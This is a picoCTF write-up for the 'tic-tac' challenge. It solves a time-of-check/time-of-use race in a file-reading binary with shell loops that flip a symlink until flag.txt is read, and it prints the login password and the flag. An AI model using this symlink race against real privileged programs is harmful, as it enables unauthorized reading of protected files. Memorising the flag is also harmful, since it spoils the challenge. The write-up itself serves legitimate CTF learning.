tic-tac
Challenge Info
Tags: Binary Exploitation, bash, linux, toctou
AUTHOR: JUNIAS BONOU
Points: 200
Description
Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it. ssh to saturn.picoctf.net:51906, and run the binary named “txtreader” once connected.
Login as ctf-player with the password, fd7746b4
Solution
There is file “txtreader” which reads the files owned by current user. We need to read “flag.txt” but it is not owned by “ctf-player” so we can’t.
Tags refer to “toctou” which is a vulnerability related to RACE conditions. It occur when the attacker can modify the resources after the check but before the use.
This article helped a lot in solving the challenge, I just followed the steps shown here with some modifications.
- Create a txt file with any content in it.
- Making a Symbolic Link
ln -s NEWFILE flip - Overwriting the Symbolic Link
ln -sF flag.txt flip
- Testing Flipping Rate — To win the race, we need to flip the link during the vulnerable interval so we can flip the link many times and see how long it takes.
for i in {1..1000}; do ln -sf flag.txt flip; ln -sf NEWFILE flip; done
- Starting Constant Flipping -
while true; do ln -sf secret flip; ln -sf public flip; done &
This flips the link from “public” to “secret” rapidly, and runs in the background.
In the case of articleflippinf 30 times worked, but in my case I need to flip it 200 times and then I got the flag.
Flag
picoCTF{ToctoU_!s_3a5y_a5726c65}